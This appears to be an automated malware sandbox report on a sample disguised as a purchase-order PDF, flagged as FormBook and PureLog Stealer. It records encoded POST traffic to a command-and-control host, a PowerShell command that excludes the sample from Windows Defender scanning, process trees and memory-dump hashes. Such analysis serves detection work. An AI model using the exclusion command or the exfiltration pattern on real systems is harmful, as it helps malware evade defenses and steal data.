Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50014	172.67.131.144	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:12:38.343216896 CET	668	OUT	POST /1lpi/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 223 Connection: close Host: www.jyshe18.buzz Origin: http://www.jyshe18.buzz Referer: http://www.jyshe18.buzz/1lpi/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 4e 34 61 68 77 52 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 49 54 7a 46 62 58 50 49 30 58 56 75 78 47 79 34 69 6d 79 33 54 76 50 46 76 52 39 4b 6d 79 4a 6f 42 55 55 43 44 70 39 31 66 79 6c 75 39 53 56 2b 68 65 6c 71 6f 6a 62 52 35 76 72 42 73 72 33 73 49 6c 45 77 44 52 32 35 33 33 78 31 70 77 37 45 51 4b 6e 58 4f 36 67 4a 47 44 6a 42 78 74 46 55 61 2b 65 50 31 56 55 43 51 78 30 46 30 68 73 38 65 55 62 79 51 44 77 68 67 4e 6f 6c 32 6f 2b 50 69 5a 79 2f 38 6a 72 56 37 2b 46 47 4d 76 58 4f 5a 4e 4e 53 4d 6e 37 75 70 6a 58 4a 31 43 76 57 52 69 66 45 34 63 61 57 76 75 46 79 42 6f 79 54 44 78 78 6f 77 4f 58 6d 77 49 5a 6a 66 50 58 32 53 49 6b 58 42 52 36 69 41 5a 55 3d Data Ascii: N4ahwR=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmyJoBUUCDp91fylu9SV+helqojbR5vrBsr3sIlEwDR2533x1pw7EQKnXO6gJGDjBxtFUa+eP1VUCQx0F0hs8eUbyQDwhgNol2o+PiZy/8jrV7+FGMvXOZNNSMn7upjXJ1CvWRifE4caWvuFyBoyTDxxowOXmwIZjfPX2SIkXBR6iAZU=
Jan 10, 2025 15:12:38.995687008 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 14:12:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.jyshe18.buzz/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pwode0hOvurpRz1GAQ8%2FkBijiYMc1YoijqLET%2FznYzFcPCah2TSVkecy%2FC9xf6jxKH2d9dZv4jnREWTJEIT7OOFyzn1a9vJIdnoVRGpTPIdTdkDEnvL96x8Op5zjDaxv8J8Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd435e1a9a0f49-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1506&rtt_var=753&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=668&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body>
Jan 10, 2025 15:12:38.995704889 CET	18	IN	Data Raw: 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: </html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50015	172.67.131.144	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:12:40.887387037 CET	10750	OUT	POST /1lpi/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 10303 Connection: close Host: www.jyshe18.buzz Origin: http://www.jyshe18.buzz Referer: http://www.jyshe18.buzz/1lpi/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 4e 34 61 68 77 52 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 49 54 7a 46 62 58 50 49 30 58 56 75 78 47 79 34 69 6d 79 33 54 76 50 46 76 52 39 4b 6d 78 70 6f 42 6a 38 43 44 4f 52 31 4e 69 6c 75 68 43 56 2f 68 65 6c 6e 6f 6a 44 56 35 76 6e 52 73 70 66 73 4b 47 63 77 42 6b 61 35 38 33 78 31 6d 51 37 5a 4f 36 6e 43 4f 35 49 4e 47 44 7a 42 78 74 46 55 61 34 79 50 38 6b 55 43 53 78 30 47 6a 52 73 67 4a 45 62 4b 51 44 6f 78 67 4f 46 51 33 5a 65 50 69 35 69 2f 76 67 44 56 34 65 46 59 4a 76 58 2f 5a 4e 42 7a 4d 6e 6e 59 70 69 6a 6a 31 43 72 57 51 6b 61 31 69 65 75 63 36 34 74 32 66 71 65 76 59 54 64 2b 37 4e 50 5a 77 74 39 4c 4e 4f 72 46 59 4a 31 6a 64 6b 75 39 55 2b 4a 4e 7a 42 37 43 34 4d 65 48 5a 4d 38 53 32 31 35 70 48 6a 4a 43 53 70 47 66 39 69 79 4a 62 4f 73 32 33 45 32 47 4d 58 63 6c 30 7a 7a 73 73 4d 78 69 6c 41 77 76 33 42 6d 38 4b 75 34 57 6e 64 39 73 79 38 4e 64 32 44 48 6c 68 41 6a 33 69 4b 54 50 7a 57 76 63 2f 6e 66 51 39 6e 5a 76 66 30 33 41 31 4d 65 6b 52 46 35 31 45 48 53 78 54 34 37 48 78 32 45 [TRUNCATED] Data Ascii: N4ahwR=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmxpoBj8CDOR1NiluhCV/helnojDV5vnRspfsKGcwBka583x1mQ7ZO6nCO5INGDzBxtFUa4yP8kUCSx0GjRsgJEbKQDoxgOFQ3ZePi5i/vgDV4eFYJvX/ZNBzMnnYpijj1CrWQka1ieuc64t2fqevYTd+7NPZwt9LNOrFYJ1jdku9U+JNzB7C4MeHZM8S215pHjJCSpGf9iyJbOs23E2GMXcl0zzssMxilAwv3Bm8Ku4Wnd9sy8Nd2DHlhAj3iKTPzWvc/nfQ9nZvf03A1MekRF51EHSxT47Hx2ER2FES5al4cwVW2xRasy8+xyzK2Qyy6rTiPclneZxzIOYHQlcJ97B4HCa60UDNVSdtCBi1PmtGfHNeKUvLiz7YeGkKT4RgNtLqtnETDOWe55t67XYpAxUht91GoD5THFCfy8qU1kuhg10AEb4fEb9EDK7e/mPcql1Gpaj/pE2P5hM43p2tRzs0C3MVnSpbhM6UFPkKy9ODI+qMoZo1vf24I29uY9UdJncU9AtsHqkMgp+QnBhnKm6YDKCp6T1TCZjbzSGpD/9rzoBWQ1cWaBYFWUIDMLR6uy9TrRbtV+Agfv6NvMNdQGUoKoI13zhL9FxlLuVEVdY5hDObNqyqVouy7N09VCd4O/IuWAZ96QBOr5LynqqTN3SxVwzkNbfogg+6DADfh6cmdHNCmj0HlsvKelIS2req41kHgS8MBGvSK9wMHRGgk81GNNSPLczmTUE74z730Em8oaL8BDEp4UozomWkVT4JjK+vbGygYey7CLXpha17GO0HzH57PKE/ZyKUtNDt0Qy4y/trmNQw0ezJ/y4wk+mNbOmQ7vhwiK5RQj0MGVEwIEbccrltklUrSJhMXdXBSINuc+LYbD6hjmNwtbE0zrBHI4z0GM504sKCh8oKcbKXXA4T6xwVHnqzGw4CX5IaI63LYKLqxI0zvuKGCA7GvAny7AQOo [TRUNCATED]
Jan 10, 2025 15:12:41.554668903 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 14:12:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.jyshe18.buzz/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrpfefqNBxgfW59IE%2BpoPby7e%2B5R%2FzjZc1ibHcba7yDPe82%2BvQB6hlK8pRdTQgdJVPgusbrDKKGI9Tpk9S%2BuJyTr5f36TAl2DAYUz%2BJSU7RAdJLyYV6vpitUhpDPZn%2BitWYu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd436e2e164376-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2538&min_rtt=2538&rtt_var=1269&sent=5&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10750&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</cent
Jan 10, 2025 15:12:41.554692030 CET	30	IN	Data Raw: 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: er></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50016	172.67.131.144	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:12:43.476260900 CET	385	OUT	GET /1lpi/?SJ3=vToHyHVhRPNLk&N4ahwR=XO6lNaUCtrQGcU2USTz27ElFlDWrimrsd9ytkxpugSckEiM1CKodZj4VrjBa4PsrlwO68eKRpavYImQlE0qw/C9imwnZW7neNvgXOAig099dS9Lz8lx2NAM= HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.jyshe18.buzz User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Jan 10, 2025 15:12:44.071671009 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 14:12:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.jyshe18.buzz/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oWP%2Fdy2TSNjXxB%2B%2BGCelKc%2B7hhAy4d0MlIlIVHsm%2BHIS99BU9AQq0g1C0Ks4bBmjjxN4JO1uzJdvxw27BRSf8PPdmVJyO0YCIE%2FtmKvRuxqab1zmin8oGaQx4lkDUL%2FuLvwS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd437e2c5c4238-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2094&min_rtt=2094&rtt_var=1047&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=385&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center>
Jan 10, 2025 15:12:44.071692944 CET	27	IN	Data Raw: 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: </body></html>0

Target ID:	0
Start time:	09:10:38
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\PO-0005082025 pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Imagebase:	0xd70000
File size:	792'064 bytes
MD5 hash:	4185664F91AECCF6D3DCA2609FE0659E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1764900052.0000000007890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1752661123.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:10:40
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Imagebase:	0x120000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:10:40
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\PO-0005082025 pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Imagebase:	0x110000
File size:	792'064 bytes
MD5 hash:	4185664F91AECCF6D3DCA2609FE0659E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:10:40
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:10:40
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\PO-0005082025 pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Imagebase:	0xe0000
File size:	792'064 bytes
MD5 hash:	4185664F91AECCF6D3DCA2609FE0659E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:10:40
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\PO-0005082025 pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Imagebase:	0xdb0000
File size:	792'064 bytes
MD5 hash:	4185664F91AECCF6D3DCA2609FE0659E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2292265378.00000000018B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2293444782.0000000001E40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:11:27
Start date:	10/01/2025
Path:	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe"
Imagebase:	0xd40000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2978571194.0000000002970000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:11:31
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cttune.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cttune.exe"
Imagebase:	0xc20000
File size:	72'192 bytes
MD5 hash:	E515AF722F75E1A5708B532FAA483333
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2978728918.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2978800956.0000000005010000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	09:11:43
Start date:	10/01/2025
Path:	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe"
Imagebase:	0xd40000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2977853967.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	09:11:56
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.5%
Total number of Nodes:	204
Total number of Limit Nodes:	18

Executed Functions

Function 07982D70 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\ lw, xrefs: 07983179
4'dq, xrefs: 07983967
xbgq, xrefs: 07982EA0
phq, xrefs: 07983A3E
TJiq, xrefs: 07982F16
Tedq, xrefs: 079835C7

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: 4'dq$TJiq$Tedq$\ lw$phq$xbgq
API String ID: 0-2391381870
Opcode ID: 8403d234180dc29beffb429b395fb6e1eec4517a6d9c5c5967f2b323efcd3a3b
Instruction ID: 876b17c02e54ca44e311853e864b2dbd111b9bb69884a66e7f859d6c383b89c1
Opcode Fuzzy Hash: 8403d234180dc29beffb429b395fb6e1eec4517a6d9c5c5967f2b323efcd3a3b
Instruction Fuzzy Hash: EFB2C375A00228CFDB64DF69C984ADDBBB2FF89304F1581E9D509AB265DB319E81CF40

Function 0581AAC4 Relevance: 6.9, Strings: 5, Instructions: 652
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hhq, xrefs: 0581C774
Hhq, xrefs: 0581C943
Hhq, xrefs: 0581C6E1
Hhq, xrefs: 0581C7FB
Hhq, xrefs: 0581C885

Memory Dump Source

Source File: 00000000.00000002.1755799822.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: Hhq$Hhq$Hhq$Hhq$Hhq
API String ID: 0-1427472961
Opcode ID: aa5bb0949ece2f478dba47df416caeb34f6e46c753c8d26f1710f87440f513de
Instruction ID: 2ca4bc7d5b0b3c5e4818f6594ab05dfe4a4902ff321b4f8c864e242f94dc2cc5
Opcode Fuzzy Hash: aa5bb0949ece2f478dba47df416caeb34f6e46c753c8d26f1710f87440f513de
Instruction Fuzzy Hash: 34425D70E002588FDB54DFA8C8947AEBBF6BF88300F1485A9D809EB385DB349D45CB95

Function 079A4600 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9657cdde620716c3a7ed07aa686bdd7fadadbf0fecbd360575f25a449cee8d31
Instruction ID: b27a0f8cf5e0ecd25b25e64eff1bc4667d47a00bbd9e3ba6ad9defc5264bc4ae
Opcode Fuzzy Hash: 9657cdde620716c3a7ed07aa686bdd7fadadbf0fecbd360575f25a449cee8d31
Instruction Fuzzy Hash: E0C1AEB07026459FEB25DB7AC450BAE77EAAFC9704F14446ED14ACB3A0CB74E805C791

Function 0581C110 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755799822.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460f838f3a06edb45b7403a2222295760808f3e0dea269a0b42719b9676e3bb9
Instruction ID: 1bef624e216b01b6792ac9b540783d1ca5f1b432e4185084c152c61d571bff43
Opcode Fuzzy Hash: 460f838f3a06edb45b7403a2222295760808f3e0dea269a0b42719b9676e3bb9
Instruction Fuzzy Hash: 43C14B71A002588FCB15CFA9C980BADBBB6BF88310F1485A9DC49EB255DB309D85CF55

Function 07985248 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da0c2e3944f8cf208990ced25df80b6d96a04bc9168dbb607b5547602ab73382
Instruction ID: 52c5e37cd9559a938b953ae62ac83a06cc1d80fb0edc42c5806fc7fb88c3a210
Opcode Fuzzy Hash: da0c2e3944f8cf208990ced25df80b6d96a04bc9168dbb607b5547602ab73382
Instruction Fuzzy Hash: DC8179B4E09209CFCF54EFA9D440AEEBBB6EF8A305F11842AD409A7251D774495ACF40

Function 07985E50 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca43b4b8a0f30ef8322a55f990ff2b4b068dedb3245e1a74a3630421dd80aaf
Instruction ID: 28fd6f36b9ed074340719c1575d166b17c302453c9027ab61a90206a6accc589
Opcode Fuzzy Hash: bca43b4b8a0f30ef8322a55f990ff2b4b068dedb3245e1a74a3630421dd80aaf
Instruction Fuzzy Hash: 3C2128B1E04618CBDB58DFABD9006DEFBF2AFC9304F04C16AC418AB255EB7409468F50

Function 0798A6F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a63468e039631aa2b1647b734a02383e355ecb9c14720099085434aad124a7c
Instruction ID: 7897f00a75a8497bd0eb2d5e953141a8a1c2c3193e8d71c942ffa94a77a737ff
Opcode Fuzzy Hash: 2a63468e039631aa2b1647b734a02383e355ecb9c14720099085434aad124a7c
Instruction Fuzzy Hash: CC2105B0D042199BEB19DF97D8057EEBFB6EFC9300F04C06AD408A6264DB7409458FA0

Function 07985E60 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5087702d18672fe3bcaded718552bf8664bd984b64894b6820dbbbd142c846
Instruction ID: 3a3bd9d0782a9c7ca26b0dd9074d028b50165bd68dd45aa77fcb0d70d0eb48dc
Opcode Fuzzy Hash: 9a5087702d18672fe3bcaded718552bf8664bd984b64894b6820dbbbd142c846
Instruction Fuzzy Hash: D121F8B1D04618CBEB58DFABC94069EFBF6BFC8304F10C06AC418A7255EB7009468F50

Function 0798A708 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9772641dbfa3d484ad407ceff9a33ff3897ec33fdff61f3dfbf9a38b3bbe49b
Instruction ID: eaed83ebe925e81e399ac167347fb9bb879b112e5812320781af8dd6f8d20677
Opcode Fuzzy Hash: a9772641dbfa3d484ad407ceff9a33ff3897ec33fdff61f3dfbf9a38b3bbe49b
